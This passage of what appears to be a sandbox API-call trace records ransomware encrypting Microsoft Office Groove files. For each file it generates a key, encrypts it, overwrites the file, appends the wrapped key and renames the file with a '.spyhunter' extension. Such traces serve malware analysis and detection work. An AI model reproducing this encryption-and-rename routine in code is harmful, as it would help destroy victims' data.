RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0106.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fae8*=0x30) returned 1 [0106.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\relay.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0106.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER") returned 95 [0106.076] StrStrW (lpFirst="RELAY.CER", lpSrch=".txt") returned 0x0 [0106.076] GetProcessHeap () returned 0x2c0000 [0106.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0106.076] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57faac*=0x3de, lpOverlapped=0x0) returned 1 [0106.091] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffc22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.091] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3de, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57faac*=0x3de, lpOverlapped=0x0) returned 1 [0106.110] GetProcessHeap () returned 0x2c0000 [0106.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.110] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.111] WriteFile (in: hFile=0x170, lpBuffer=0x57faec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x57faec*, lpNumberOfBytesWritten=0x57faac*=0x4, lpOverlapped=0x0) returned 1 [0106.111] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faac*=0x30, lpOverlapped=0x0) returned 1 [0106.111] CloseHandle (hObject=0x170) returned 1 [0106.111] GetProcessHeap () returned 0x2c0000 [0106.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0106.111] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER.spyhunter") returned 105 [0106.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\relay.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\relay.cer.spyhunter")) returned 1 [0106.561] GetProcessHeap () returned 0x2c0000 [0106.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0106.561] GetProcessHeap () returned 0x2c0000 [0106.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0106.561] GetProcessHeap () returned 0x2c0000 [0106.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8380 | out: hHeap=0x2c0000) returned 1 [0106.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faf0 | out: pbBuffer=0x57faf0) returned 1 [0106.561] GetProcessHeap () returned 0x2c0000 [0106.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0106.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fae8*=0x30) returned 1 [0106.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.609] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV") returned 76 [0106.609] StrStrW (lpFirst="VIBE.WAV", lpSrch=".txt") returned 0x0 [0106.609] GetProcessHeap () returned 0x2c0000 [0106.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0106.609] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57faac*=0x2800, lpOverlapped=0x0) returned 1 [0106.743] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.743] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57faac*=0x2800, lpOverlapped=0x0) returned 1 [0106.743] GetProcessHeap () returned 0x2c0000 [0106.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.743] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.743] WriteFile (in: hFile=0xb4, lpBuffer=0x57faec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x57faec*, lpNumberOfBytesWritten=0x57faac*=0x4, lpOverlapped=0x0) returned 1 [0106.749] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faac*=0x30, lpOverlapped=0x0) returned 1 [0106.749] CloseHandle (hObject=0xb4) returned 1 [0106.759] GetProcessHeap () returned 0x2c0000 [0106.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0106.760] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV.spyhunter") returned 86 [0106.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav.spyhunter")) returned 1 [0106.764] GetProcessHeap () returned 0x2c0000 [0106.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0106.764] GetProcessHeap () returned 0x2c0000 [0106.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0106.764] GetProcessHeap () returned 0x2c0000 [0106.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x2c0000) returned 1 [0106.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fae8 | out: pbBuffer=0x57fae8) returned 1 [0106.765] GetProcessHeap () returned 0x2c0000 [0106.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0106.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fae0*=0x30) returned 1 [0106.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.766] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg") returned 103 [0106.766] StrStrW (lpFirst="GlobeButtonImage.jpg", lpSrch=".txt") returned 0x0 [0106.766] GetProcessHeap () returned 0x2c0000 [0106.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.766] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57faa4*=0x1b49, lpOverlapped=0x0) returned 1 [0106.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe4b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.784] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b49, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57faa4*=0x1b49, lpOverlapped=0x0) returned 1 [0106.784] GetProcessHeap () returned 0x2c0000 [0106.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.784] WriteFile (in: hFile=0xb4, lpBuffer=0x57fae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x57fae4*, lpNumberOfBytesWritten=0x57faa4*=0x4, lpOverlapped=0x0) returned 1 [0106.784] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faa4*=0x30, lpOverlapped=0x0) returned 1 [0106.784] CloseHandle (hObject=0xb4) returned 1 [0106.784] GetProcessHeap () returned 0x2c0000 [0106.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0106.784] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg.spyhunter") returned 113 [0106.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg.spyhunter")) returned 1 [0106.785] GetProcessHeap () returned 0x2c0000 [0106.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0106.785] GetProcessHeap () returned 0x2c0000 [0106.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0106.785] GetProcessHeap () returned 0x2c0000 [0106.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8010 | out: hHeap=0x2c0000) returned 1 [0106.786] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fae8 | out: pbBuffer=0x57fae8) returned 1 [0106.786] GetProcessHeap () returned 0x2c0000 [0106.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0106.786] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fae0*=0x30) returned 1 [0106.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.786] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg") returned 111 [0106.786] StrStrW (lpFirst="CalendarViewButtonImages.jpg", lpSrch=".txt") returned 0x0 [0106.786] GetProcessHeap () returned 0x2c0000 [0106.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.786] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57faa4*=0x2800, lpOverlapped=0x0) returned 1 [0106.809] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.809] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57faa4*=0x2800, lpOverlapped=0x0) returned 1 [0106.809] GetProcessHeap () returned 0x2c0000 [0106.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.809] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.809] WriteFile (in: hFile=0xb4, lpBuffer=0x57fae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x57fae4*, lpNumberOfBytesWritten=0x57faa4*=0x4, lpOverlapped=0x0) returned 1 [0106.811] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faa4*=0x30, lpOverlapped=0x0) returned 1 [0106.811] CloseHandle (hObject=0xb4) returned 1 [0106.811] GetProcessHeap () returned 0x2c0000 [0106.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0106.811] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg.spyhunter") returned 121 [0106.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg.spyhunter")) returned 1 [0107.116] GetProcessHeap () returned 0x2c0000 [0107.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.116] GetProcessHeap () returned 0x2c0000 [0107.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0107.116] GetProcessHeap () returned 0x2c0000 [0107.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37bc98 | out: hHeap=0x2c0000) returned 1 [0107.179] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fad8 | out: pbBuffer=0x57fad8) returned 1 [0107.179] GetProcessHeap () returned 0x2c0000 [0107.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.180] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fad0*=0x30) returned 1 [0107.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0107.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp") returned 109 [0107.560] StrStrW (lpFirst="UnreadIconImagesMask.bmp", lpSrch=".txt") returned 0x0 [0107.560] GetProcessHeap () returned 0x2c0000 [0107.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.560] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa94*=0x5a4, lpOverlapped=0x0) returned 1 [0107.566] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.567] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa94*=0x5a4, lpOverlapped=0x0) returned 1 [0107.567] GetProcessHeap () returned 0x2c0000 [0107.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.581] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.583] WriteFile (in: hFile=0xb4, lpBuffer=0x57fad4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x57fad4*, lpNumberOfBytesWritten=0x57fa94*=0x4, lpOverlapped=0x0) returned 1 [0107.583] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa94*=0x30, lpOverlapped=0x0) returned 1 [0107.583] CloseHandle (hObject=0xb4) returned 1 [0107.583] GetProcessHeap () returned 0x2c0000 [0107.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.584] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp.spyhunter") returned 119 [0107.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp.spyhunter")) returned 1 [0107.584] GetProcessHeap () returned 0x2c0000 [0107.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.585] GetProcessHeap () returned 0x2c0000 [0107.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.585] GetProcessHeap () returned 0x2c0000 [0107.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d290 | out: hHeap=0x2c0000) returned 1 [0107.585] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fad8 | out: pbBuffer=0x57fad8) returned 1 [0107.586] GetProcessHeap () returned 0x2c0000 [0107.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.587] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fad0*=0x30) returned 1 [0107.587] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.767] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html") returned 109 [0107.767] StrStrW (lpFirst="FormsPrintTemplate.html", lpSrch=".txt") returned 0x0 [0107.767] GetProcessHeap () returned 0x2c0000 [0107.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.767] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa94*=0x262, lpOverlapped=0x0) returned 1 [0107.790] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.791] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa94*=0x262, lpOverlapped=0x0) returned 1 [0107.791] GetProcessHeap () returned 0x2c0000 [0107.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.791] WriteFile (in: hFile=0x178, lpBuffer=0x57fad4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x57fad4*, lpNumberOfBytesWritten=0x57fa94*=0x4, lpOverlapped=0x0) returned 1 [0107.791] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa94*=0x30, lpOverlapped=0x0) returned 1 [0107.791] CloseHandle (hObject=0x178) returned 1 [0107.792] GetProcessHeap () returned 0x2c0000 [0107.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.792] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html.spyhunter") returned 119 [0107.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html.spyhunter")) returned 1 [0107.792] GetProcessHeap () returned 0x2c0000 [0107.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.793] GetProcessHeap () returned 0x2c0000 [0107.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.793] GetProcessHeap () returned 0x2c0000 [0107.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3a98 | out: hHeap=0x2c0000) returned 1 [0107.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fad0 | out: pbBuffer=0x57fad0) returned 1 [0107.793] GetProcessHeap () returned 0x2c0000 [0107.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fac8*=0x30) returned 1 [0107.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 